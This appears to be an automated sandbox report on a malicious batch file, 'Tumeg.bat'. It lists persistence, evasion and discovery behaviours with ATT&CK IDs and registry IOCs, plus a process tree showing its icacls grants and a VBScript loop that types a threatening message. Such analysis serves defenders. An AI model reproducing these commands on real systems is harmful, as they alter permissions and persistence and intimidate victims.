2e5731639e0f5eed877b8a6efc4f765e0afcf1065f5046f963abcc9df818a163

Resubmissions

23-11-2024 19:08

241123-xtgvssxphk 8

22-11-2024 10:09

241122-l6tvcavlak 10

Analysis

max time kernel
151s
max time network
176s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
23-11-2024 19:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Tumeg.bat
Size

43KB
MD5

6fd336e404c820cea27c1ab6f627189c
SHA1

f3762bd54aabdf45b086ff6da85aa4fa04a183be
SHA256

2e5731639e0f5eed877b8a6efc4f765e0afcf1065f5046f963abcc9df818a163
SHA512

fe3c7a22f99ff66aea81c8a74c0ebfb3b2f49baa3757b83fd6d243eb1b9838dce42e82627392b5b3567846d01420b0b70da0ad2e1e1dad952f52b0ac79c249cd
SSDEEP

768:58RhJLWEE08AxPzjc5O9tKVA2BCielbMq6ii5qHxAx7K5OpKVA4BHnKbK63Vgjg:589jg

Score

8^/10

defense_evasion discovery evasion persistence privilege_escalation

Malware Config

Signatures

Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
5192	attrib.exe

Modifies file permissions 1 TTPs 12 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1476	icacls.exe
3636	icacls.exe
2612	icacls.exe
2924	icacls.exe
2488	icacls.exe
1848	icacls.exe
1656	icacls.exe
4352	icacls.exe
4544	icacls.exe
4392	icacls.exe
3732	icacls.exe
4824	icacls.exe

Unexpected DNS network traffic destination 3 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222

Enumerates connected drives 3 TTPs 2 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\D:	explorer.exe
File opened (read-only)	\??\F:	explorer.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4284	sc.exe

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
3940	reg.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Event Triggered Execution: Accessibility Features 1 TTPs
Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.
persistence privilege_escalation

Accessibility Features
T1546.008

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
472	PING.EXE
5576	reg.exe
2304	PING.EXE

Checks SCSI registry key(s) 3 TTPs 36 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4248	ipconfig.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
3404	taskkill.exe
2956	taskkill.exe

Modifies File Icons 2 IoCs

ransomware

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\3 = "C:\\ProgramData\\Microsoft\\Device Stage\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico"	reg.exe

Modifies registry class 8 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHo = 6801000088020000	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3785588363-1079601362-4184885025-1000\{9E9DB6C3-F9FD-4052-93AF-BD0CC9795C92}	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000100000000000000ffffffff	explorer.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
3588	NOTEPAD.EXE

Runs net.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
2304	PING.EXE
472	PING.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3344	msedge.exe
3344	msedge.exe
5060	msedge.exe
5060	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
5060	msedge.exe
5060	msedge.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

description	pid	Process
Token: SeDebugPrivilege	3404	taskkill.exe
Token: SeDebugPrivilege	2956	taskkill.exe
Token: SeShutdownPrivilege	5056	explorer.exe
Token: SeCreatePagefilePrivilege	5056	explorer.exe
Token: SeShutdownPrivilege	5056	explorer.exe
Token: SeCreatePagefilePrivilege	5056	explorer.exe
Token: SeShutdownPrivilege	5056	explorer.exe
Token: SeCreatePagefilePrivilege	5056	explorer.exe
Token: SeShutdownPrivilege	5056	explorer.exe
Token: SeCreatePagefilePrivilege	5056	explorer.exe
Token: SeShutdownPrivilege	5056	explorer.exe
Token: SeCreatePagefilePrivilege	5056	explorer.exe

Suspicious use of FindShellTrayWindow 13 IoCs

pid	Process
4844	notepad.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5060	msedge.exe

Suspicious use of SendNotifyMessage 11 IoCs

pid	Process
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe
5056	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 832 wrote to memory of 4040	832	cmd.exe	81
PID 832 wrote to memory of 4040	832	cmd.exe	81
PID 4040 wrote to memory of 1460	4040	net.exe	82
PID 4040 wrote to memory of 1460	4040	net.exe	82
PID 832 wrote to memory of 4876	832	cmd.exe	83
PID 832 wrote to memory of 4876	832	cmd.exe	83
PID 832 wrote to memory of 1656	832	cmd.exe	102
PID 832 wrote to memory of 1656	832	cmd.exe	102
PID 832 wrote to memory of 2388	832	cmd.exe	103
PID 832 wrote to memory of 2388	832	cmd.exe	103
PID 832 wrote to memory of 4844	832	cmd.exe	104
PID 832 wrote to memory of 4844	832	cmd.exe	104
PID 832 wrote to memory of 2304	832	cmd.exe	105
PID 832 wrote to memory of 2304	832	cmd.exe	105
PID 832 wrote to memory of 1396	832	cmd.exe	106
PID 832 wrote to memory of 1396	832	cmd.exe	106
PID 832 wrote to memory of 3676	832	cmd.exe	107
PID 832 wrote to memory of 3676	832	cmd.exe	107
PID 832 wrote to memory of 3112	832	cmd.exe	108
PID 832 wrote to memory of 3112	832	cmd.exe	108
PID 832 wrote to memory of 1904	832	cmd.exe	109
PID 832 wrote to memory of 1904	832	cmd.exe	109
PID 832 wrote to memory of 4208	832	cmd.exe	110
PID 832 wrote to memory of 4208	832	cmd.exe	110
PID 832 wrote to memory of 776	832	cmd.exe	111
PID 832 wrote to memory of 776	832	cmd.exe	111
PID 832 wrote to memory of 2776	832	cmd.exe	112
PID 832 wrote to memory of 2776	832	cmd.exe	112
PID 832 wrote to memory of 1248	832	cmd.exe	113
PID 832 wrote to memory of 1248	832	cmd.exe	113
PID 832 wrote to memory of 1876	832	cmd.exe	114
PID 832 wrote to memory of 1876	832	cmd.exe	114
PID 832 wrote to memory of 1976	832	cmd.exe	115
PID 832 wrote to memory of 1976	832	cmd.exe	115
PID 832 wrote to memory of 4956	832	cmd.exe	116
PID 832 wrote to memory of 4956	832	cmd.exe	116
PID 832 wrote to memory of 3988	832	cmd.exe	117
PID 832 wrote to memory of 3988	832	cmd.exe	117
PID 832 wrote to memory of 4824	832	cmd.exe	118
PID 832 wrote to memory of 4824	832	cmd.exe	118
PID 832 wrote to memory of 4068	832	cmd.exe	119
PID 832 wrote to memory of 4068	832	cmd.exe	119
PID 832 wrote to memory of 2860	832	cmd.exe	120
PID 832 wrote to memory of 2860	832	cmd.exe	120
PID 832 wrote to memory of 4392	832	cmd.exe	121
PID 832 wrote to memory of 4392	832	cmd.exe	121
PID 832 wrote to memory of 4796	832	cmd.exe	122
PID 832 wrote to memory of 4796	832	cmd.exe	122
PID 832 wrote to memory of 3408	832	cmd.exe	123
PID 832 wrote to memory of 3408	832	cmd.exe	123
PID 832 wrote to memory of 1644	832	cmd.exe	124
PID 832 wrote to memory of 1644	832	cmd.exe	124
PID 832 wrote to memory of 1352	832	cmd.exe	125
PID 832 wrote to memory of 1352	832	cmd.exe	125
PID 832 wrote to memory of 5056	832	cmd.exe	126
PID 832 wrote to memory of 5056	832	cmd.exe	126
PID 832 wrote to memory of 2832	832	cmd.exe	127
PID 832 wrote to memory of 2832	832	cmd.exe	127
PID 832 wrote to memory of 2120	832	cmd.exe	128
PID 832 wrote to memory of 2120	832	cmd.exe	128
PID 832 wrote to memory of 3220	832	cmd.exe	129
PID 832 wrote to memory of 3220	832	cmd.exe	129
PID 832 wrote to memory of 4264	832	cmd.exe	130
PID 832 wrote to memory of 4264	832	cmd.exe	130

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5192	attrib.exe
1552	attrib.exe
4168	attrib.exe
5008	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Tumeg.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:832
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4040
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:1460
- C:\Windows\system32\choice.exe
  choice /c YN /n /m ""
  2⤵
  PID:4876
- C:\Windows\system32\icacls.exe
  icacls "C:\ProgramData\Tumeg.exe" /grant Administrators:(OI)(CI)F
  2⤵
  - Modifies file permissions
  PID:1656
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Notepad" /v iPointSize /t REG_DWORD /d 36 /f
  2⤵
  PID:2388
- C:\Windows\system32\notepad.exe
  notepad
  2⤵
  - Suspicious use of FindShellTrayWindow
  PID:4844
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 2
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2304
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "Y"
  2⤵
  PID:1396
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "o"
  2⤵
  PID:3676
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "u"
  2⤵
  PID:3112
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "r"
  2⤵
  PID:1904
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" " "
  2⤵
  PID:4208
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "P"
  2⤵
  PID:776
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "C"
  2⤵
  PID:2776
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" " "
  2⤵
  PID:1248
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "i"
  2⤵
  PID:1876
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "s"
  2⤵
  PID:1976
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" " "
  2⤵
  PID:4956
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "f"
  2⤵
  PID:3988
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "u"
  2⤵
  PID:4824
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "c"
  2⤵
  PID:4068
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "k"
  2⤵
  PID:2860
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "e"
  2⤵
  PID:4392
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "d"
  2⤵
  PID:4796
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" " "
  2⤵
  PID:3408
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "b"
  2⤵
  PID:1644
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "y"
  2⤵
  PID:1352
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" " "
  2⤵
  PID:5056
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "T"
  2⤵
  PID:2832
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "u"
  2⤵
  PID:2120
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "m"
  2⤵
  PID:3220
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "e"
  2⤵
  PID:4264
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "g"
  2⤵
  PID:536
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "!"
  2⤵
  PID:4320
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" " "
  2⤵
  PID:2060
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "R"
  2⤵
  PID:4572
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "e"
  2⤵
  PID:5040
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "m"
  2⤵
  PID:2220
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "e"
  2⤵
  PID:4380
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "m"
  2⤵
  PID:3008
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "b"
  2⤵
  PID:392
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "e"
  2⤵
  PID:5008
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "r"
  2⤵
  PID:2420
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" ","
  2⤵
  PID:4248
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" " "
  2⤵
  PID:4388
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "y"
  2⤵
  PID:2104
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "o"
  2⤵
  PID:2440
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "u"
  2⤵
  PID:632
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" " "
  2⤵
  PID:3184
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "c"
  2⤵
  PID:1332
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "a"
  2⤵
  PID:4376
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "n"
  2⤵
  PID:976
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "'"
  2⤵
  PID:656
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "t"
  2⤵
  PID:232
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" " "
  2⤵
  PID:4596
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "e"
  2⤵
  PID:5012
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "s"
  2⤵
  PID:4800
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "c"
  2⤵
  PID:3112
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "a"
  2⤵
  PID:1904
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "p"
  2⤵
  PID:752
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "e"
  2⤵
  PID:2756
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" " "
  2⤵
  PID:2116
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "f"
  2⤵
  PID:4464
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "r"
  2⤵
  PID:840
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "o"
  2⤵
  PID:1716
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "m"
  2⤵
  PID:4500
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" " "
  2⤵
  PID:4656
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "h"
  2⤵
  PID:3732
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "e"
  2⤵
  PID:4892
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "r"
  2⤵
  PID:4992
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "e"
  2⤵
  PID:4868
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "."
  2⤵
  PID:1848
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" " "
  2⤵
  PID:4548
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "S"
  2⤵
  PID:4372
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "t"
  2⤵
  PID:4704
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "a"
  2⤵
  PID:2380
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "r"
  2⤵
  PID:4072
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "t"
  2⤵
  PID:1064
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" " "
  2⤵
  PID:5112
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "c"
  2⤵
  PID:1704
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "r"
  2⤵
  PID:4720
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "y"
  2⤵
  PID:3220
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "i"
  2⤵
  PID:3024
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "n"
  2⤵
  PID:5060
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "g"
  2⤵
  PID:2428
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "!"
  2⤵
  PID:1984
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" " "
  2⤵
  PID:3744
